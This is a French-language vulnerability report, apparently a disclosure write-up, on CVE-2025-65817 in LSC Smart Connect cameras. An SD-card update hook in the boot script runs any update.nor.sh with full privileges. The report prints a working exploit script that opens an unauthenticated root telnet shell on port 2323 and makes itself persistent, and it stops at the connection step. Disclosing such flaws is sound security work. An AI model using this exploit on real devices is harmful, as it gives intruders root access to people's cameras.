
Voici la CVE-2025-65817
| Champs | Valeur |
|---|---|
| Titre | Rapport de vulnérabilité : LSC Smart Connect Camera |
| Date | 2024-02-15 |
| Description | Exploitation du hook de mise à jour de la carte SD pour lancer des shells distants sur les caméras LSC Smart Connect. |
| Étiquettes | iot, vulnérabilité, cve |
| Firmware | 1.14.13 |
La vulnérabilité trouvée consiste à exploiter le système de mise à jour dans start_app.sh, plus précisément via le montage de la carte SD et le fichier update.nor.sh.
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"
La section local/sbin/start_app.sh:50–99 fait aveuglément confiance à tout fichier nommé update.nor.sh situé sur la carte SD. Pendant le processus de démarrage, le script :
update.nor.sh vers /tmp/update.nor.sh,Plus tard dans la séquence de démarrage (local/sbin/start_app.sh:108–129), le fichier copié est :
Cette exécution a lieu avant le démarrage du ipc_service principal, ce qui signifie que le script s'exécute dans un environnement à privilèges maximaux où les utilitaires réseau, les fonctions de watchdog et les assistants de mise à jour sont déjà disponibles.
L'exploit consiste à créer un shell et à ouvrir un port via telnetd, qui est présent sur la caméra :
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]
Il suffit d'écrire un script .sh sur la carte SD et de le nommer update.nor.sh.
L'exploit que j'ai choisi est :
#!/bin/sh
telnetd -l /bin/sh -p 2323 &
echo "Telnet start by update.nor.sh" > /tmp/exploit_success
cp /mnt/update.nor.sh /mnt/config/hook-boot.sh
date > /tmp/exploit_time
Nous confirmons que le port est ouvert.

Nous nous connectons via telnet :
